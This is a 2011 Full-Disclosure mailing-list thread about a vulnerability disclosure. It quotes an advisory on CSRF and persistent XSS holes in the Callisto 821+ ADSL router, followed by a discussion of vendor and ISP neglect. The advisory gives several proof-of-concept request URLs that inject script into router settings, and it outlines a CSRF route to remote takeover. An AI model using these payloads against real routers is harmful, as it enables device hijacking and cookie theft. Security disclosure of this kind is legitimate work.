Message-ID: <015d01cc5157$6874a020$9b7a6fd5@ml>
Date: Tue, 2 Aug 2011 23:58:52 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: "-= Glowing Sex =-" <doomxd@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
Hello 0xd0!
> So, you could maybe have to think if the router has port 80 open and I assume a remote-service
Yes, port 80 (and also 8008, as I wrote in my first advisory about Callisto 821+) is open, but it's accessible only locally - from the local computer and LAN, and not from the Internet (by default remote access is disabled). And all those hundreds of CSRF, XSS and DoS holes which I disclosed, not counting the "unlimited" XSS and DoS holes, allow bypassing this restriction on remote access and attacking the control panel remotely. In particular, it's possible via CSRF to enable remote access from the Internet to the control panel and then, by using the default login and password (or, if worried that the user changed it, by creating via CSRF a new user with a specified login and password), log into the control panel and take the router under control.
About such "unlimited" vulnerabilities I wrote in the article How to find billion of XSS vulnerabilities (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-November/007233.html).
> Luckily some isp's do protect your modem, as many are so it seems, coded weakly in the firmware area.
The developer of the modem already protected (as they thought) their consumers by disallowing access from the Internet by default. My ISP Ukrtelecom (now my ex-ISP) didn't change this setting and also thought it was enough to protect clients. After, at the beginning of April, I entered the control panel for the first time and found that it was full of CSRF holes (in addition to the default login and password), I talked with Ukrtelecom's representative by phone.
And I asked him why their company didn't change the default login and password, didn't inform all their clients about the control panel, the login and password for the specific model of router (different models have differences, and no documentation on the routers was given to the clients) and the fact that the default login and password were used, and didn't recommend that clients change them. And they answered that because access from the Internet is disallowed by default, they thought that everything was secure, and their company (a holemaking one - with multiple holes on multiple of their web sites and in their Internet and telecommunication services, about which I've informed them over the last years) doesn't worry about their clients. And my question about the multiple CSRF holes which can remotely change any settings of the modem he didn't answer, because he didn't know what it is. So attacks from local (from lamers or viruses on the local computer or LAN) and attacks from the Internet on the modem owner logged into the control panel are possible and are not considered a threat at all by the developer of the router and this ISP (a similar situation can exist with other ISPs).
> That is consumer value, and I assume the company has released a patch?
No, the company (Iskra) completely ignored these issues (and there are hundreds of holes in their router). They ignored both my first letter from the 26th of May and all other letters (24 letters in total during May - July about different vulnerabilities). It looks like they don't care about the security of their products and of their clients. Similarly to ISP Ukrtelecom, which is the distributor of Iskra's routers in Ukraine (possibly the only ISP which distributes these routers) and which also completely ignored the security of their own sites, services, the routers which they sell and of their clients.
So all consumers of Iskra modems should know the truth - the real situation with the security of the routers of this company. I made my decision (after all these holes in Ukrtelecom and Iskra and their ignoring them) - I no longer use either their services or their modems. Besides, Iskra is a funny company - of their official e-mails (mentioned at the site), service@ is not working at all, while e-marketing@ works, but they're not answering, not fixing, just ignoring, as I've already mentioned.
> why then disclose the thing, i guess you either go one way or the other, know what i mean ?
No, I don't :-). But there are always reasons for disclosing vulnerabilities. And there are reasons in this particular case, and they are obvious and mentioned in every post of mine about this router (besides worrying about the security of people, which is the default in all my disclosures).
> but yea, nice stuff if xss is your thing. ;')
All these hundreds of CSRF, XSS and DoS holes in this router are nice by themselves. And yes, they were all found by me. All these holes in Callisto 821+ are listed here (http://securityvulns.ru/news/ZTE/Callisto/821.html) (of the 24 advisories, 3APA3A forgot to put two from July in, so they are not in this list - I've already reminded him two times, so that he'd fix it).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message -----
From: -= Glowing Sex =-
To: MustLive
Cc: full-disclosure@...ts.grok.org.uk
Sent: Saturday, July 30, 2011 1:42 AM
Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
So... advanced...
So, you could maybe have to think if the router has port 80 open, and I assume a remote-service; most ISPs would have the port 80 remote-assist open for possibly helping a customer. I know that is the first thing I switch to 'off', and actually, my ISP went through that with me on install.
Luckily some ISPs do protect your modem, as many are, so it seems, coded weakly in the firmware area.
That is consumer value, and I assume the company has released a patch? Usually, you would either contact a vendor and completely see it through, as in wait for their reply. I do not see this in the actual timeline; I only see that you have said you're working 'with' them, and their CEO... why then disclose the thing? I guess you either go one way or the other, know what I mean?
You should have a 2011-*-* - Vendor has now patched the issue regarding this, and possibly, if it is serious, assigned a BID/CVE.
I am only assuming what I see with other disclosure policies... but yea, nice stuff if XSS is your thing. ;')
cheers
0xd0
On 30 July 2011 07:30, MustLive <mustlive@...security.com.ua> wrote:
Hello list!
After a discussion with Michael Simpson about these vulnerabilities in
Callisto 821+, I want to warn you about new multiple security
vulnerabilities in the ADSL modem Callisto 821+ (SI2000 Callisto821+ Router).
These are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities. In April I had already drawn the attention of Ukrtelecom's
representative (this modem was bought at Ukrtelecom) to multiple
vulnerabilities in this model of Callisto modems (and other models could
also be affected).
SecurityVulns ID: 11700.
-------------------------
Affected products:
-------------------------
Vulnerable is the following model: SI2000 Callisto821+ Router: X7821 Annex A
v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
firmware and also other models of Callisto must also be vulnerable.
----------
Details:
----------
These attacks should be conducted against the modem owner while he is logged
into the control panel. Taking into account that it's unlikely to catch him in
this state, it's possible to use the before-mentioned vulnerabilities
(http://websecurity.com.ua/5161/) for conducting a remote login (logging him
into the control panel). After that it's possible to conduct a CSRF or XSS
attack.
CSRF (WASC-09):
Every connection in section LAN connections, the default one as well as other
connections, has advanced settings. Let's look at the example of the default
connection (iplan).
In section Edit connection, in subsection Edit Ip Interface
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan)
via CSRF it's possible to change the settings (IP, Mask and others) of the
connection.
In subsection Edit Tcp Mss Clamp
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp)
via CSRF it's possible to change the settings of the connection.
In subsection Edit Rip Versions
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImRipVersions)
via CSRF it's possible to change the settings of the connection.
In subsection Edit NAT
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImNatHelper)
via CSRF it's possible to change the settings of the connection.
XSS (WASC-08):
There are many persistent XSS vulnerabilities in the above-mentioned four
subsections of section Edit connection.
In subsection Edit Ip Interface:
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E
In subsections Edit Tcp Mss Clamp, Edit Rip Versions and Edit NAT the
situation is similar.
Attacks via the names of parameters are also possible (when the XSS code is
put in the name of a parameter), which I wrote about earlier
(http://websecurity.com.ua/5277/).
In this case the code will be executed immediately, and also on visiting the
pages http://192.168.1.1/system/events.html and
http://192.168.1.1/shared/event_log_selection.html.
------------
Timeline:
------------
2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in the modems
which they give (sell) to their clients.
2011.07.23 - disclosed at my site.
2011.07.24 - informed the developers (Iskratel).
I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/5296/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/